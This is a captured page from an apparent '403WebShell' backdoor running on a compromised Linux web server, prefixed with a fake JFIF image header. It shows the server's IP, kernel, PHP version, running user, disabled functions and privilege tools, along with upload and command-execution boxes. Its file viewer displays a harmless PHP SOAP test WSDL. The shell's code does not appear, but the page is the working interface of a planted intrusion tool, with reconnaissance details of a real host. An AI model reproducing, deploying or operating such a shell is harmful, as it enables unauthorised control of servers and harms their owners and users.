????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/soap/tests/bugs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/soap/tests/bugs/bug36614.wsdl
<?xml version="1.0" encoding="UTF-8" ?> 
<definitions name="SonicMobile Web-Services" 
   targetNamespace="http://soap.sonicmobile.com/sonicmobile.wsdl"
   xmlns="http://schemas.xmlsoap.org/wsdl/" 
   xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" 
   xmlns:sonic="http://soap.sonicmobile.com/sonicmobile.wsdl"
   xmlns:xsd="http://www.w3.org/2001/XMLSchema">

    <types>
        <xsd:schema xmlns="http://www.w3.org/2000/10/XMLSchema">
            <import namespace="http://schemas.xmlsoap.org/soap/encoding/"/>
            <complexType name="TransportCount">
                <all>
                    <element name="transport" type="string" />
                    <element name="count" type="integer" />
                    <element name="rate" type="integer" />
                    <element name="last_message" type="integer" />
                </all>
            </complexType>                    
            <complexType name="ArrayOfTransportCount">
                <complexContent>
                    <restriction base="soapenc:Array">
                        <attribute ref="soapenc:arrayType" arrayType="TransportCount[]" />
                    </restriction>
                </complexContent>
            </complexType>
        </xsd:schema>
    </types>
    
   <message name="userSendMessageRequest">
     <part name="sourceUser" type="xsd:int"/>
     <part name="password" type="xsd:string"/>
     <part name="destinationUser" type="xsd:int"/>
     <part name="content" type="xsd:string"/>
     <part name="sendRepliesTo" type="xsd:string"/>
     <part name="reference" type="xsd:string"/>
   </message>

   <message name="sendMessageRequest">
     <part name="application" type="xsd:string"/>
     <part name="password" type="xsd:string"/>
     <part name="destination" type="xsd:string"/>
     <part name="content" type="xsd:string"/>
     <part name="reference" type="xsd:string"/>
     <part name="requestSource" type="xsd:string"/>
     <part name="customer" type="xsd:string"/>
     <part name="class" type="xsd:string"/>
   </message>

   <message name="MessageResponse">
     <part name="messageid" type="xsd:int"/>
     <part name="response" type="xsd:string"/>
   </message>

   <message name="messageCountRequest">
	   <part name="password" type="xsd:string"/>
   </message>

   <message name="messageCountResponse">
	   <part name="transports" type="tns:ArrayOfTransportCount"/>
   </message>
   
   <message name="serverStatusRequest">
        <part name="password" type="xsd:string"/>
    </message>
    <message name="serverStatusResponse">
        <part name="status_string" type="xsd:string"/>
    </message>
 
    <message name="flushGatewayRequest">
        <part name="password" type="xsd:string"/>
    </message>
    <message name="flushGatewayResponse">
        <part name="status_string" type="xsd:string"/>
    </message>
    
   <portType name="SonicMobilePortType">
     <operation name="userSendMessage">         
       <input  message="sonic:userSendMessageRequest"/>
       <output message="sonic:MessageResponse"/>
     </operation>

     <operation name="sendMessage">
       <input  message="sonic:sendMessageRequest"/>
       <output message="sonic:MessageResponse"/>
     </operation>

     <operation name="messageCount">
	     <input message="sonic:messageCountRequest"/>
	     <output message="sonic:messageCountResponse"/>
     </operation>
     
     <operation name="serverStatus">
         <input message="sonic:serverStatusRequest"/>
         <output message="sonic:serverStatusResponse"/>
     </operation>
     
     <operation name="flushGateway">
         <input message="sonic:flushGatewayRequest"/>
         <output message="sonic:flushGatewayResponse"/>
     </operation>
   </portType>

   <binding name="SonicMobileBinding" type="sonic:SonicMobilePortType">
     <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http" />

     <operation name="userSendMessage">
       <soap:operation soapAction="http://soap.sonicmobile.com/SonicMobile/SOAP#userSendMessage"/>

       <input>
         <soap:body 
           encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
           namespace="http://soap.sonicmobile.com/SonicMobile/SOAP" 
           use="encoded" />
       </input>
       
       <output>
         <soap:body 
           encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
           namespace="http://soap.sonicmobile.com/SonicMobile/SOAP"
           use="encoded" />
       </output>
     </operation>

     <operation name="sendMessage">
       <soap:operation soapAction="http://soap.sonicmobile.com/SonicMobile/SOAP#sendMessage"/>

       <input>
         <soap:body 
           encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
           namespace="http://soap.sonicmobile.com/SonicMobile/SOAP" 
           use="encoded" />
       </input>
       
       <output>
         <soap:body 
           encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
           namespace="http://soap.sonicmobile.com/SonicMobile/SOAP"
           use="encoded" />
       </output>
     </operation>
 
     <operation name="messageCount">
       <soap:operation soapAction="http://soap.sonicmobile.com/SonicMobile/SOAP#messageCount"/>

       <input>
         <soap:body 
           encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
           namespace="http://soap.sonicmobile.com/SonicMobile/SOAP" 
           use="encoded" />
       </input>
       
       <output>
         <soap:body 
           encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
           namespace="http://soap.sonicmobile.com/SonicMobile/SOAP"
           use="encoded" />
       </output>
     </operation>
     
     <operation name="serverStatus">
         <soap:operation soapAction="http://soap.sonicmobile.com/SonicMobile/SOAP#serverStatus"/>
         
         <input>
             <soap:body 
                        encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
                        namespace="http://soap.sonicmobile.com/SonicMobile/SOAP" 
                        use="encoded" />
         </input>
         
         <output>
             <soap:body 
                        encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
                        namespace="http://soap.sonicmobile.com/SonicMobile/SOAP"
                        use="encoded" />
         </output>
     </operation>
     
     <operation name="flushGateway">
         <soap:operation soapAction="http://soap.sonicmobile.com/SonicMobile/SOAP#flushGateway"/>
         
         <input>
             <soap:body 
                        encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
                        namespace="http://soap.sonicmobile.com/SonicMobile/SOAP" 
                        use="encoded" />
         </input>
        <output>
             <soap:body 
                        encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
                        namespace="http://soap.sonicmobile.com/SonicMobile/SOAP"
                        use="encoded" />
         </output>
     </operation>
     
   </binding>

   <service name="SonicMobile">
     <port name="SonicMobilePort" binding="sonic:SonicMobileBinding">
       <soap:address location="http://soap.sonicmobile.com/"/>
     </port>
   </service>

</definitions>

Youez - 2016 - github.com/yon3zu
LinuXploit